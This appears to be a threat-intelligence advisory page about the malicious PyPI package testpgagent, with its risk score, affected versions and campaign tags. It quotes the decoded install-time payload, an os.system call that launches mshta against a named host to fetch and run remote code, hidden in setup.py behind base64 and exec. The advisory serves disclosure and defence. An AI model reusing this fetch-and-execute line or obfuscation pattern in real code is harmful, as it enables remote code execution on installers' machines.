Supply-chain threat intelligence

Incident detail

criticalpypi·obfuscation·osv

Malicious code in testpgagent (PyPI)

testpgagent

Risk score

92

AI summary

Indexed incident for testpgagent (pypi).

Description

On pip install, setup.py line 19 calls exec(base64.b64decode(...)) whose decoded body is import os; os.system('cmd /c "mshta http://fixars.top"'). This launches Windows mshta.exe against http://fixars.top over plaintext HTTP, fetching and executing an arbitrary HTML-application payload on the installer's machine. The payload is obfuscated with base64+exec to evade casual inspection. The fetch destination is unrelated to any declared publisher, content is unpinned and mutable, and execution is fully attacker-controlled. Any Windows machine running pip install TestPGAgent==0.2 will execute remote code chosen by whoever controls fixars.top at the moment of install.

During installation, the code attempts to download and start a malicious executable.

Likely related to 2025-08-raknet-testing-package.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-easyaillm

Reasons (based on the campaign):

  • Downloads and executes a remote executable.

  • obfuscation

  • malware

Technical details

Affected versions

=0.2=0.1

Indicators

  • affected version=0.275%
  • affected version=0.175%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents